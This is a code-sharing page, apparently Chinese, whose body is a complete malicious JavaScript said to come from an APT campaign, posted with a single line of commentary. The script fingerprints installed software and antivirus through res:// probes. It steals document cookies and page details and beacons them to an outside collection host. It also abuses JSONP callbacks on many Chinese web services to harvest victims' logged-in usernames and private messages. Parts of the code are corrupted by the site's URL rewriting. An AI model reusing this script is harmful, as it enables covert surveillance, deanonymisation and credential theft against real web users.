首页 > 代码库 > 抓到一个搞APT的JS

抓到一个搞APT的JS

代码具体有什么用我就不说了,有多屌自己看撒。

 

//使用Javascript并结合RES协议判断软件是否存在。//havesoft变量用于保存存在软件的信息var havesoft = ‘no ie ‘; function program(name, path){    this.name = name;    this.path = path;}//设置需要遍历的磁盘,默认为扫描C,D。var disk=[‘c‘,‘d‘]; //变量soft部分设置的是需要检测软件安装的常见路径和相应的资源编号。    var soft=[new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘),            new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘),            new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘),            new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘),            new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘),            new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘),            new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘),            new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘),            new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘),            new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘),            new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘),            new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘),            new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘),            new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘),            new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘),            new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘),            new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘),            new program(‘Foxmail‘, ‘:\\Program Files\\Foxmail\\foxmail.exe/2/RAM‘),            new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘),            new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘),            new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘),            new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘),            new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘),            new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘),            new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘),            new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘),            new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘),            new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘),            new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘),            new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘),            new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘),            new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘),            new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘),            new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘),            new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘),            new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone Labs\\ZoneAlarm\\framewrk.dll/2/102‘),                        new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),                        new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),                        new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),                        new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),                        new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),                        new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),            new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)];//开始通过循环分别匹配磁盘和相应的文件,并判断文件是否存在,如果存在就说明存在软件。if(navigator.userAgent.indexOf("MSIE")>= 0){  havesoft =‘ ‘;  for(i=0;i<soft.length;i++)  {       for(j=0;j<disk.length;j++)       {           var img=new Image();    //创建新的Image对象           res=‘res://‘+disk[j]+soft[i].path;   //通过RES协议引入资源文件        img.src=http://www.mamicode.com/res;   //将RES资源文件赋给img        if(img.height!=30 || img.width != 28)   //判断高度是否不等于30或者宽度不等于20,如果不等于,则认为有这个图片。        {               havesoft = havesoft + soft[i].name + ‘, ‘;           }       }     }}(function(){(new Image()).src=http://www.mamicode.com/‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘+escape((function(){try{return document.location.href}catch(e){return ‘‘}})())+‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())+‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())+‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());})();window.onerror=function(){    return true;}http_server = "http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1=";var info = {};info.browser = function(){    ua = navigator.userAgent.toLowerCase();    var rwebkit = /(webkit)[ \/]([\w.]+)/;    var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;    var rmsie = /(msie) ([\w.]+)/;    var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;    var match = rwebkit.exec( ua ) ||    ropera.exec( ua ) ||    rmsie.exec( ua ) ||    ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) ||    [];    return {        name: match[1] || "", version: match[2] || "0"    };}();info.url =  document.location.href;info.ua = escape(navigator.userAgent);info.lang = navigator.language;info.referrer = document.referrer;info.location = window.location.href;info.toplocation = top.location.href;info.cookie = escape(document.cookie);info.domain = document.domain;info.title = document.title;info.screen = function(){    var c = "";    if (self.screen) {        c = screen.width+"x"+screen.height;    }    return c;}();info.flash = function(){    var f="",n=navigator;    if (n.plugins && n.plugins.length) {        for (var ii=0;ii<n.plugins.length;ii++) {            if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) {                f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1];                break;            }        }    }    else    if (window.ActiveXObject) {        for (var ii=10;ii>=2;ii--) {            try {                var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);");                if (fl) {                    f=ii + ‘.0‘;                    break;                }            }            catch(e) {}                }    }    return f;}();function inj_script(a, b) {    var o = document.createElement("script");    o.src = a;    if (b) {        if (!window.ActiveXObject) {            o.onload = b;        }        else {            o.onreadystatechange = function () {                if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) {                    b();                }            }        }    }    document.getElementsByTagName("body")[0].appendChild(o);    return o;}function json2str(o) {    if(typeof o == ‘string‘) return o;    var arr = [];    var fmt = function(s) {        if (typeof s == ‘object‘ && s != null) return json2str(s);        return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s;    }    for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i]));    return ‘{‘ + arr.join(‘,‘) + ‘}‘;}video_login_callback = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=video_login_callback";}e163_comment = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=e163_comment";}weibo_login = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=weibo_login";}sina_1368631232407449 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sina_1368631232407449";}jingdong_service = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jingdong_service";}loginInfoJson = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=loginInfoJson";}hxbase_json1368703155802logininfo = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=hxbase_json1368703155802logininfo";}jsonp1368703516133 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368703516133";}ajaxLogan_updateNickName = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=ajaxLogan_updateNickName";}jsonp1368705676193 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368705676193";}jsonp1368706291697 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368706291697";}jsonp1368751970360 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368751970360";}jQuery1368754535817 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368754535817";}jQuery1368758656634 = function(o){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368758656634";}window.onload = function(){    new Image().src = http://www.mamicode.com/http_server + escape(json2str(info)) +"&content2=info%20";    try{        inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘);    }    catch(e){}    try{        inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘);    }    catch(e){}    try{        inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘);    }    catch(e){}    try{        inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘);    }    catch(e){}    try{        inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘);    }    catch(e){}    try{        inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘);    }    catch(e){}    try{        inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘);    }    catch(e){}    try{        inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘);    }    catch(e){}    try{        inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘);    }    catch(e){}    try{        inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘);    }    catch(e){}    try{        inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘);    }    catch(e){}    try{        inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘);    }    catch(e){}    try{        inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘);    }    catch(e){}    try{        inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘);    }    catch(e){}    try{        inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘);    }    catch(e){}    try{        inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘);    }    catch(e){}    try{        inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘);    }    catch(e){}    try{        inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘);    }    catch(e){}    try{        inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage&params.pageSize=1&params.pageNo=1&_=1368693252438&var=tianya_msg‘);    }    catch(e){}    setTimeout(function(){        var o = Blog.camp.profile;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=Blog.camp.profile";    }    ,3000);    setTimeout(function(){        var o = [_passport];        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=%5B_passport%5D";    }    ,3000);    setTimeout(function(){        var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn";    }    ,3000);    setTimeout(function(){        var o = sso_username;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sso_username";    }    ,3000);    setTimeout(function(){        var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId;        new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId";    }    ,3000);};

 

抓到一个搞APT的JS